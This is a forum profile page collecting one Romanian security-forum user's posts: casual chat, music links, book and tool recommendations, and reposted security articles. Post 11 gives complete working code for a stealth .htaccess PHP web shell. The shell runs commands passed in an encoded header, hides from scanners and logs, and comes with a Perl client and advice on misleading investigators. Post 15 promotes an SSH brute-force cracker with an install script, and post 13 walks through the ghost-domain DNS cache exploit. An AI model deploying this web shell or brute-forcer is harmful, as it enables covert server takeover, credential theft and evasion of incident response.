Jump to content

co4ie

Active Members
  • Posts

    638
  • Joined

  • Last visited

  • Days Won

    6

Everything posted by co4ie

  1. Acum m-am apucat de The Practice of System and Network Administration Second Edition ... si din primele randuri pot sa spun ca este un must read pt system/network administrators ... Geniala cartea mai ales pe partea de organizare a task-urilor in departamentele IT si chiar problemele create de CEO, colegi, lipsa fondurilor si a timpului !! Download
  2. @100 vezi cum vorbesti copil atomic ... Datii si voi ban lu asta .. ca`i nesimtit rau !!
  3. Check THIS out
  4. Busta Rhymes - Why Stop Now (Explicit) ft. Chris Brown
  5. Jay-Z & Kanye - Ni**as In Paris (Explicit)
  6. Lil Wayne - Mirror ft. Bruno Mars http://www.youtube.com/watch?v=OZLUa8JUR18]Lil Wayne - Mirror ft. Bruno Mars - YouTube Nu se poate pune mai mult de un clip?
  7. Lua is a powerful, fast, lightweight, embeddable scripting language. It is heavily used in the game industry and security tools such as Wireshark, Snort, nmap and Sandcat also make use of it. The language combines simple procedural syntax with powerful data description constructs based on associative arrays and extensible semantics. Lua is dynamically typed, runs by interpreting bytecode for a register-based virtual machine, and has automatic memory management with incremental garbage collection, making it ideal for configuration, scripting, and rapid prototyping. Push the boundaries. Run code in every language from inside Lua scripts. RudraScript™ is an experimental Lua extension library that allows you to run code written in nearly every scripting language from within Lua scripts. Currently JavaScript, PascalScript, Perl, PHP, Python, Ruby & VBScript are supported. RudraScript was designed by Syhunt for use in the next release of the Sandcat Browser, but can also be used separately. How To Use It RudraScript is effortless to use. Just load RudraScript using require and call [languagename] [YOUR_CODE_STRING] to execute your code (for example: php [[echo('Hello');]]). All global and local Lua variables (string, number, boolean and nil) are automatically made accessible from within the code just like if they were part of the Lua script that is running it, as shown in the examples below. More examples are included within the library distribution Example 1 - JavaScript in Lua -- This prints "HELLO WORLD from Rudra" followed by "Bye!" require "RudraScript" msg = 'Hello World' function sayhello(s) javascript [[ Rudra.WriteLn(msg.toUpperCase()+' From '+s); msg = 'Bye!' ]] end sayhello('Rudra') print(msg) Example 2 - PHP in Lua require "RudraScript" function sayhello(a, php [[ echo("Hello $a from $b"); $a = 'Bye!'; ]] print(a) end sayhello('World','Rudra') Example 3 - Ruby in Lua require "RudraScript" function sayhello(a, ruby [[ puts("Hello "+a+" from "+ a = 'Bye!' ]] print(a) end sayhello('World','Rudra') RudraScript Compiler By using the RudraScript Compiler, you can turn your script into a small executable (this is entirely optional). System Requirements 128 MB of memory 100 MB of free disk space Windows XP, 2003, 2008, Vista or 7. As a user of a more recent Windows version you may need to be logged in with full administration rights Additional Requirements Already included: Lua , freely available from The Programming Language Lua PascalScript, freely available from Home | RemObjects Software PHP , freely available from PHP: Hypertext Preprocessor Ruby , freely available from http://www.ruby-lang.org Not included, must be downloaded separately: ActivePerl (optional), for running Perl scripts Python (optional), for running Python scripts More Info Download Sursa
  8. Ca sa functioneze trebuie sa ai cat de cat acces ... ca sa compilezi si sa poti da permisiuni de executare la un fisier ...
  9. co4ie

    Fun stuff

    Micket Has Joined The Dark Side !!
  10. @nokia94 ... vezi poate ai treaba si noi te tinem de vorba!! Join Date: Jan 2011, Posts 401 ... tu vb serios? Lasa in pula mea trollingul si pune mana pe o carte ... sau pune mana pe lopata si da zapada la o parte !! Se poate face... dar iti trebuie scule calumea , si in plus intrebuie ca in aia 6 km sa fie camp ... sau foarte putine obstacole (copaci & shit) !! Practic o sa ai nevoie de 3 antele facute calumea sau cumparate ceea ce o sa te cam arda la buget !! Ai putea incerca intai cu o singura antena ... sa vezi care este calitatea semnalului de la primul bloc (daca e vreo retea in acel bloc!)! Eu totusi cred ca ar fi mai simplu sa iti faci un abonament .. probabil ca in zilele ploioase/cu ceata/ninsoare (daca reusesti sa pui in aplicare proiectul) nu o sa ai net !!
  11. People keep referring to the htshells project as stealth!?!?!?!? They are very unstealthy, leaving plenty of evidence in the logs, but it did get me thinking, what would a .htaccess stealth shell look like? In order to claim the status of "stealth" the shell would have to meet the following requirements: No bad function calls Hidden file Hidden payload Hidden url WAF/IDS bypass Limited forensic evidence Looks like a small list, shouldn't be too hard.... No bad function calls The shell should not contain any bad function calls such as eval, passthru, exec, system, `` or similar operators. This is to avoid detection from scanners such as anti vrus or static analysis tools. We have a few options here, such as using a variable variable to dynamically assign the function to call, or we could go with the non alpha php shell. I did however choose to go with a feature that relies on common methods and AFAIK not many scanners pick up on variable function calls. Hidden file I already solved this with my htshells project. Having your shell in a dot file keeps it hidden on linux. If you cannot upload a .htaccess file however I would aim to hide in plain sight with a index.php file instead. Hidden payload In order to keep the payload out of the url we'll provide it outside of the request URI and request body. A cookie is a common place to store the payload, but I decided to use a non cookie header. Just to be safe, in case someone decides to log cookies. Hidden url Luckily the htaccess file also offers us an option to hide the url of our web shell using mod_rewrite. This allows us to invoke the shell through a different url. WAF/IDS bypass By applying common encoding we can ensure that plaintext rules don't match our payload and make parsing the request expensive enough to ensure that realtime decoding isn't feasible. For the extra paranoid, encoding in combination with basic obfuscation will stop detection by IDS which can offload the offline decoding to an agent. I chose plain base64_encoding, and padded it with some bytes to make automated parsing fail. Limited forensic evidence This is where most shells fails, most web scripts use request parameters for command input. This is great on penetration tests as it offers transparency to the client, but it's not very stealthy. I'll start by illustrating a log segment for favicon requests. 1 # grep favicon.ico /var/log/apache2/access.log 2 78.84.166.152 - - [20/Apr/2011:09:46:30 +0400] "HEAD /favicon.ico HTTP/1.0" 200 - "-" "-" 3 76.120.74.98 - - [20/Apr/2011:09:52:27 +0400] "GET /favicon.ico HTTP/1.0" 200 9326 "-" "Safari/6533.19.4 CFNetwork/454.11.5 Darwin/10.6.0 (i386) (MacBook2%2C1)" 4 76.120.74.98 - - [20/Apr/2011:10:07:29 +0400] "GET /favicon.ico HTTP/1.0" 200 9326 "-" "Safari/6533.19.4 CFNetwork/454.11.5 Darwin/10.6.0 (i386) (MacBook2%2C1)" 5 192.168.24.122 - - [20/Apr/2011:10:32:31 +0400] "GET /favicon.ico HTTP/1.0" 200 9326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16" As you can see from the example, the log records the IP of the client making the request, the (server) time of the request, the request method and url, response code, response size, referrer and user-agent. Normally the htshell would be a dead giveaway: 1 127.0.0.1 - - [23/Jan/2012:11:47:32 +1100] "GET /.htaccess?c=uname -a HTTP/1.1" 200 617 "-" "Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1" It is clear that the url accessed was .htaccess,and it responded with a 200 OK response code instead fo the usual 403, it is also evident what command was run. In order to keep the shell from leaving forensic evidence, we will disguise the request to the shell as a normal 200 OK or a 404 response to a seemingly normal file using the hidden url and hidden payload. Now for the actual implementation, using php for the programming language: - No bad function calls Invoking function names by string FTW! $e = str_replace('y','e','yxyc'); $e($cmd) will call exec on $cmd. - Hidden file the shell is .htaccess, as hidden as it gets. - Hidden payload Receive the payload via the X-ETAG header, which is accessible via: $_SERVER['HTTP_X_ETAG'] and send the response via the same header. This requires output buffering to be enabled otherwise PHP will complain about headers being sent after output has started. Luckily this is not an admin flag and can be set from within the .htaccess file itself using: php_value output_buffering 1. - Hidden url Rewrite supposed url to the .htaccess file if X-ETAG request header is set RewriteEngine on RewriteCond %{HTTP:X-ETAG} !^$ RewriteRule .* .htaccess [L] This allows us to make requests to existing files, and gettting the shell if the X-ETAG header is set. - WAF/IDS bypass By padding the base64 encoding with two bytes automated base64 decoding attempts will fail with a length check error. base64_decode(substr($_SERVER['HTTP_X_ETAG'],2)) - Limited forensic evidence By generating output PHP will set the response code to 200 OK, although a header() call can easily be used to make it something else. Thanks to the output buffering the content of the .htaccess file can be discarded and the response size can be set to a known value. I'm using print str_repeat("A", 9326); to match the size of my favicon which can be seen in the first log snippet. This all combines to the following file: 01 # Self contained .htaccess stealth web shell - Part of the htshell project 02 # Written by Wireghoul - http://www.justanotherhacker.com 03 04 # Override default deny rule to make .htaccess file accessible over web 05 <files ~="" "^\.ht"=""> 06 Order allow,deny 07 Allow from all 08 </files> 09 10 # Make .htaccess file be interpreted as php file. This occur after apache has interpreted 11 # the apache directoves from the .htaccess file 12 AddType application/x-httpd-php .htaccess 13 14 # Enable output buffering so we can fudge content length in logs 15 php_value output_buffering 1 16 17 # Rewrite supposed url to the .htaccess file if X-ETAG request header is set 18 RewriteEngine on 19 RewriteCond %{HTTP:X-ETAG} !^$ 20 RewriteRule .* .htaccess [L] 21 22 # SHELL <?php ob_clean(); $e = str_replace('y','e','yxyc'); $e(base64_decode(substr($_SERVER['HTTP_X_ETAG'],2))." 2>&1", $o); header("X-ETAG: AA".base64_encode(implode("\r\n ", $o))); print str_repeat("A", 9326); ob_flush(); exit(); ?> Unfortunately the WAF/IDS bypass makes it somewhat unfriendly to use with traditional HTTP clients, so I wrote a perl based client: 01 #!/usr/bin/perl 02 # Interface for the mod_php htaccess stealth shell 03 # Written by Wireghoul - http://www.justanotherhacker.com 04 05 use warnings; 06 use strict; 07 use MIME::Base64; 08 use LWP::UserAgent; 09 10 &usage unless $ARGV[0]; 11 my $url = $ARGV[0]; 12 pop(@ARGV); #keep readline happy 13 my $ua = LWP::UserAgent->new; 14 $ua->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16'); 15 16 sub usage { 17 print "Usage: $0 url\nExample: $0 http://vuln.com/upload/favicon.ico\n"; 18 exit 2; 19 } 20 21 my $cmd = ''; 22 print "Connecting to shell at $url - type 'exit' to exit"; 23 until ($cmd eq 'exit') { 24 print "\nshell> "; 25 $cmd = readline; 26 chomp $cmd; 27 my $payload = 'AA'.encode_base64($cmd); 28 my $response = $ua->get( $url, 'X-ETAG' => $payload); 29 if ($response->header('X-ETAG')) { 30 print decode_base64(substr($response->header('X-ETAG'),2)); 31 } else { 32 print "Error! No payload in response!\n"; 33 } 34 } A quick demo: 01 # GET http://localhost/favicon.ico | head -1 02 ________________________________________ 03 h6 ?@@(F( 04 # ./stsh.pl http://localhost/favicon.ico 05 Connecting to shell at http://localhost/favicon.ico - type 'exit' to exit 06 shell> uname -a 07 Linux bt 2.6.39.4 #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux 08 shell> id 09 uid=33(www-data) gid=33(www-data) groups=33(www-data) 10 shell> exit 11 # tail -3 /var/log/apache2/access.log 12 127.0.0.1 - - [31/Jan/2012:14:07:59 +1100] "GET /favicon.ico HTTP/1.1" 200 9326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16" 13 127.0.0.1 - - [31/Jan/2012:14:08:01 +1100] "GET /favicon.ico HTTP/1.1" 200 9326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16" 14 127.0.0.1 - - [31/Jan/2012:14:08:03 +1100] "GET /favicon.ico HTTP/1.1" 200 9326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16" Notice there is nothing indicating any difference between the first request (normal request to the actual file) and the two shell commands. Some parting notes: Large response bodies can cause the header to exceed the maximum size defined when compiling Apache (default 8190), the best way to get around this is to store the command output in the session and return it one chunk at a time. Divert the investigator by presenting a likely scenario, if there is an existing file, such as a picture. Hotlink the image from a public forum and use the forum url as referrer value and use a known aggressive crawler as the user agent. Rewrite the shell to use different values than the X-ETAG, etc used in the demo script for better WAF bypass. I guess it's OK to call the htshells project stealth now?? Systems that log response length as headers and response body will show varying content length for the shell requests, this is not the default apache behaviour and requires additional modules to be enabled. Sursa
  12. 1. Stiu ca suporta paramerti ... pt mssql sunt altele care sunt special pt asta ! 2. Fa tu --update la sqlmap ... mie dupa fiecare update imi crapa si trebuie sa il reinstalez!
  13. DNS is a naming system which coverts human readable domain names into computer readable IP addresses. Whenever there is a query for a domain which is not in the resolver’s cache, the process happens by traversing through the entire DNS hierarchy from the root servers to the top-level domain (e.g., .com). The top-level domain (TLD) then gives us the information about the name server that has been delegated the responsibility of the domain whose IP address we are looking for. We then get the information about that domain from its name server. The results are then cached by the DNS resolver with a particular value of TTL (time-to-live), after which the entry in the cache expires. In some cases a domain may be identified as malicious and needs to be removed. This could be because of various reasons like malware propagation, phishing, etc. One of the more common methods to prevent users from accessing a domain is to delete the domain from its TLD servers. However this does not completely remove the threat because the domain will still be resolved by the resolver until the TTL expires. Normally, this is not an issue, as the TTL values are short and the offending domain will expire in seconds or minutes. In this article we will discuss a recent DNS exploit which is present in most of the DNS servers that was discovered by researchers Jian Jiang, Jinjin Liang, Kang Li, Jun Li, Haixin Duan and Jianping Wu. Their full research paper can be found here. The exploit targets a weakness in the cache update logic of some of the DNS servers. The exploit allows the cache to be overwritten in such a way that it is possible to continuously extend the TTL for the delegation data of a particular domain and prevents it from ever expiring. The domain will be completely resolvable indefinitely even though it has been deleted from the TLD servers. These types of domains have been termed Ghost Domain Names. DNS Basics First, let’s understand how DNS resolution works. Let’s say the user opens up the browser and types in infosecinstitute.com. It is now the responsibility of the DNS resolver in the user’s operating system to fetch the IP address. It first checks its local cache to see if it can find a record for the queried domain name. A cache usually contains a mapping of IP-addresses to hostnames which are saved during recent lookups so that the resolver does not have to fetch the IP address again and again. If it cannot find the IP address in its cache it queries the DNS server to see if it has a record for it. A DNS server is usually given to you by the ISP or you can manually set up a DNS server for yourself. If it still cannot find the IP Address then it goes through a recursive DNS query in which it queries different name servers to get the IP-address of the domain. As soon as it finds the IP-address it returns the IP-address back to the user and also caches it for its future use. Understanding DNS lookup It is important to understand how a DNS lookup works. We will do this by traversing the entire DNS hierarchy from the root servers to the top-level domain. Open up the terminal in Backtrack (you can use your own favorite distribution) and type in “dig”. You will get something as shown in the figure below. What we get is a list of the Root DNS Servers. Let’s use this root DNS server to query infosecinstitute.com. We do this as shown in the figure below: What we get is a list of authoritative name servers for the .com domain. Notice the dot (.) at the end. This is what makes this a fully qualified domain name (FQDN). Let’s use these name servers to query again. Now we get the list of authoritative name servers for infosecinstitute.com (which is ns1.pairnic.com and ns2.pairnic.com). Let’s query these name servers to get the IP-address of infosecinstitute.com Now in the Answer Section we can see that the IP-address for infosecinstitute.com is 216.92.251.5. SUCCESS! It is also possible for us to set custom DNS servers to query for different records. In the figure below, we will be using DIG to perform a DNS query for the A record of infosecinstitute.com using Google’s DNS server (8.8.8.8). 3599 basically indicates the time-to-live for that particular record provided by the DNS query. If we do the same process again we can see that the TTL has now reduced to 3503. In case a domain is identified as malicious, then its removal from the global domain name space is basically a 2 step process. The first is to remove its records from the TLD servers and the second is to wait for the TTL to expire across all DNS servers. To identify the IP address of a domain, one of the important things to know is the delegation data of that particular domain. The delegation data contains the NS record of a domain and its corresponding A record, i.e., the IP address of the name server. The delegation data also has a particular TTL which tells us the time until which the delegation data will be in the cache. In the figure below I am querying one of the TLD servers for .com to give me the address of a non-existing subdomain. It replies back with an Authority Section and an Additional Section which has the NS records for the domain, as well as the IP address (i.e., A record) of the name servers. Let’s see this in an example. I’ll create a subdomain named infosec.searching-eye.com on my website. Once it is done, let’s use a particular open DNS server say 8.8.8.8 (OpenDNS) to query the domain. We can see the response in the answer section. Also we can see that it has a particular TTL value of 14399. The delegation data is now cached by this server. So let’s go ahead and remove the subdomain now. As we can see, the subdomain infosec.searching-eye.com has been successfully removed. Now let’s go ahead and make the same query for the subdomain infosec.searching-eye.com from the same DNS server. Surprise, we still get a response. This is because of the cached records that are present in Google’s DNS server. As we can see, the TTL has decreased down to 12790. We know why this response is here. This is because of the fact that the delegation data for the subdomain has been cached into the DNS server because of the query we made while the subdomain was live. Let’s make the same query for the same subdomain through our default DNS server. As we can see from the image above, we get no response. This is because there were no cached records present in our default DNS server, thus it had to traverse the entire DNS hierarchy in order to find the IP address of the subdomain we were looking for. Once it reached the TLD (i.e., .com), it found out that there were no records there. Hence it returned no results. The Vulnerability The vulnerability exists in the DNS cache update policy of a particular DNS server. As discussed earlier in the article, a domain can be completely removed from the global domain name space by removing it from the TLD and allowing enough time for the delegation data to expire across all DNS servers. If somehow it is possible to extend the TTL of delegation data such that it doesn’t touch 0, then the domain will still be resolvable. Note that not all the DNS servers will be vulnerable to this kind of an exploit. However it is discussed in the paper that most of the DNS servers were found vulnerable simply because they did not follow a strict cache update logic. The first step is to register a name server. This service is generally provided by your domain service provider. I want my name server to be of the type xyz.mydomain.com rather than xyz.hostingcompany.com. Note that the IP address you provide must be a valid IP address of a name server. Once we have registered a name server, we have to set it as our name server as shown in the image below. We can confirm that testns.searching-eye.com has been successfully set as a name server by querying for an non-existent subdomain, as shown in the image below. We then create another subdomain named ghost.searching-eye.com. Once this is done, we take a particular DNS server (which we think is vulnerable) and use it to query the subdomain. So now we know that the delegation data has been cached by the DNS server. Go ahead and delete the subdomain. Now the delegation data of the domain will have a TTL which will be constantly decreasing. Since we know that the delegation data is the NS record of a domain and the A record of the name server, it can be represented as: 1 ghost.searching-eye.com 86400 IN NS testns.searching-eye.com 2 testns.searching-eye.com 86400 IN A abc.32.31.xy After the subdomain has been deleted and some time has passed, the delegation data could look something like this: 1 ghost.searching-eye.com 46400 IN NS testns.searching-eye.com 2 testns.searching-eye.com 46400 IN A abc.32.31.xy The next step is to change the name of the name server to something else like test2.searching-eye.com. Using the same DNS server (4.2.2.4) as before, we then query for the A record of the name server, i.e., test2.searching-eye.com. The resolver will look into the delegation data and make a query to the IP address of testns.searching-eye.com which is in fact the IP address of test2.searching-eye.com. It will return the IP address of the name server. But it will also notice that there is a new name server now (because the name has changed), and it will overwrite the current cache with the new one (cache update logic will vary across different DNS servers). After the cache is overwritten, the delegation data could look something like this (if indeed the DNS server does not follow a strict cache update logic and is vulnerable to the exploit discussed in this article): 1 ghost.searching-eye.com 86400 IN NS test2.searching-eye.com 2 test2.searching-eye.com 86400 IN A 192.32.31.xy Notice that the new delegation data has a new TTL value. If this process is repeated over and over again it is possible to continuously keep the TTL value from reaching zero. (Though in some cases it will reach 0 after a long period of time, read the paper for more details). In order to successfully carry out this attack over a large range the attacker had to make queries through as many vulnerable DNS servers as possible before the TTL for the delegation data of the attacker domain expired on those DNS servers. As the number of DNS servers which still cache the delegation data increases, the number of users who still resolve the domain to an IP address controlled by the attacker also increase. Detecting Ghost Domain Names Ghost domain names are those domains that have been removed from the TLD but are still resolvable by the DNS server. There could be two reasons for it: The TTL value for the delegation data of the domain has not expired. Note that these kind of domains may not qualify under the category of ghost domain names simply because there is a possibility that their TTL is not being renewed. The TTL value for the delegation data is being renewed by using the vulnerability in the DNS server. These are the steps that could be followed to identify the ghost domain names. Perform a DNS lookup on the domain by traversing the DNS hierarchy as discussed in the “DNS lookup” section in this article. Query for an A record of the domain using a particular DNS server If the DNS lookup step doesn’t give us an IP-address but we get a result from the DNS query step using a particular DNS server, then there is a possibility that the domain is a ghost domain. We cannot be sure as the results might be coming because the TTL for the delegation data on the DNS server may not have expired (excluding the possibility of resetting the TTL). Hence the challenge is now to identify which are ghost domains and which are not. The following steps could be followed for that: Note down the TTL value for the delegation data. Wait for the time equivalent to the TTL value of that domain. Perform the same query again. If the DNS server still resolves the domain then we can be convinced that the domain is a ghost domain. Conclusion In this article we discussed a vulnerability recently discussed in a paper which signifies how it is possible to illegally update the cache of a DNS server and renew its TTL value for the delegation data of a particular domain. This would mean that the domain will still be resolvable even though it has been removed from the TLD. We then discussed some of the methods through which it is possible to determine if a particular domain is a ghost domain or not. References Ghost Domain Names: Revoked Yet Still Resolvable DNS Hacking (Beginner to Advanced) Sursa
  14. co4ie

    Fun stuff

    The Official ********* Membership Application
  15. sshtrix is a very fast multithreaded SSH login cracker. It supports SSHv1 and SSHv2. sshtrix was designed to automate rapid bruteforce attacks against SSH authentification screens. Unlike other public tools, the aim is to keep it simple, stable, fast and modular. With its clean code design, it is easy to extend the code to a framework or to fork it against protocols of your choice. Download Si pt ca am dat de probleme la instalare , aveti si un script (doar modificat de mine) pt a il instala mai usor si cu toate cele necesare!! Scriptul este pt Backtrack dar poate fi modificat usor si pt celelalte distributii linux1! #!/bin/sh # a little dirty script to quickly install the libssh 0.5.2 and sshtrix 0.0.2 # from noptrix.net on backtrack 5r1 # smtx 2011 # install installsshtrix(){ # change to /usr/src dir cd /usr/src # download sshtrix wget http://www.nullsecurity.net/tools/sshtrix-0.0.2.tar.gz cat > checksums.md5 << __EOF__ cc9eecb6fb3729152a1fd79851b634fc sshtrix-0.0.2.tar.gz __EOF__ # download libssh wget --no-check-certificate http://www.libssh.org/files/0.5/libssh-0.5.2.tar.gz cat >> checksums.md5 << __EOF__ 38b67c48af7a9204660a3e08f97ceba6 libssh-0.5.2.tar.gz __EOF__ # check md5sums md5sum -c checksums.md5 #unpack src tar xzf sshtrix-0.0.2.tar.gz tar xzf libssh-0.5.2.tar.gz # install prequisites for libssh apt-get install libssl-dev cmake -y # compile/install libssh cd libssh-0.5.2 mkdir build cd build cmake -DCMAKE_INSTALL_PREFIX=/opt/libssh-0.5.2 -DCMAKE_BUILD_TYPE=Debug .. make install # compile sshtrix cd /usr/src/sshtrix-0.0.2 export CFLAGS=" -W -Wall -Wextra -O2 -std=c99 -pedantic -pthread -I inc -I /opt/libssh-0.5.2/include/ -L /opt/libssh-0.5.2/lib/" export DISTDIR=/pentest/passwords/sshtrix make -e sshtrix mkdir -p /pentest/passwords/sshtrix cp sshtrix /pentest/passwords/sshtrix/ cp doc/sshtrix.1 /usr/share/man/man1/ # create wrapper with LD_PRELOADED latest sshlib cd /pentest/passwords/sshtrix cat > sshtrix_wrap.sh << __EOF__ #!/bin/sh bash -c "export LD_LIBRARY_PATH=/opt/libssh-0.5.2/lib/ && /pentest/passwords/sshtrix/sshtrix \$*" __EOF__ chmod +x sshtrix_wrap.sh # symlink to wrapper so its in $PATH ln -s /pentest/passwords/sshtrix/sshtrix_wrap.sh /usr/local/bin/sshtrix ## clean up cd /usr/src rm libssh-0.5.2.tar.gz rm -rf libssh-0.5.2 rm sshtrix-0.0.2.tar.gz rm -rf sshtrix-0.0.2 rm checksums.md5 } # uninstall uninstallsshtrix(){ rm -rf /pentest/passwords/sshtrix rm /usr/local/bin/sshtrix rm -rf /opt/libssh-0.5.2/ rm /usr/share/man/man1/sshtrix.1 } if [ $# -ne 1 ] then echo "Error in $0 - Invalid Argument Count" echo "Syntax to install: $0 install" echo "Syntax to uninstall: $0 uninstall" exit fi if [ $1 == "install" ] then echo "installing sshtrix" installsshtrix exit fi if [ $1 == "uninstall" ] then echo "uninstalling sshtrix" uninstallsshtrix exit fi Salvati ca script.sh chmod +x script.sh ./script.sh install
  16. nu ai cum sa afli macul clientului daca nu este conectat...
  17. sqlmap mai da si erori ... cel putin la mine... dar mi se pare cel mai usor de folosit si de personalizat !! Uniscan iti descopera vulnerabilitatile aste !! Ce nu am reusit sa imi dau seama cum functioneaza este sqlininja !! Frumos POC !!
  18. nu e in plugin .. cred ca e prins in stealer sau bruteforce !!
  19. Ai zis deja ca ai modificat pozele:)) ... anyway ... le gasesti la pagina 4 a thread-ului !!
  20. ai auzit bine... dar daca nu o faci nu prea poti sa profiti 100% de android !! daca esti atent si faci totul cum trebui si daca te pricepi cat de cat la calculatoare nu o sa ai probleme !! Eu am sgs de 1 an ... l-am rootat de fiecare data cand am reinstalat androidul ... l-am brickuit de cateva ori dar l-am reparat singur.. + ca daca il futi atat de tare incat nu se mai deschide dloc nu o sa mai conteze daca e rootat...ca ai din service o sa il reseteze direct si dispare root-ul !
  21. Merci ... dar pune in code tag ... sa nu fie postul asa mare !!
  22. @bruttus139 Cand ai timp urca undeva pozele cu modificarile la adaptorul WiFi te rog !! Si teava de cupru tot la 2m se gaseste si este scumpa ... o sa mai caut pe la centrele de fier vechi ... numai pe acolo nu am ajuns !! Am "tabla" de aluminiu ... daca tot nu gasesc o sa incerc sa fac din aia !!
  23. Security and Hacking Tools Categories: Information Gathering Network Mapping Vulnerability Assessment Privilege Escalation Maintaining Access Intrusion Detection and Prevention Digital Forensics Web Application Analysis Reverse Engineering Wireless Analysis Security Distributions Malicious Code Analysis AntiSpyware & AntiVirus Tools Password Recovery & Managers Multe chestii folositoare ... chiar trebuia o lista completa cu tool-uri Sursa
  24. @backdoor ... Daca citeai acolo inainte de a latra ...vedeai ca exploitul va fi disponibil in Canvas... Probabil la urmatorul release o sa il scoata cineva si o sa il avem si noi!!detaliile o sa apara pe parcurs...
  25. selecteaza "GNOME Classic" la ecranul de login LightDM...
×
×
  • Create New...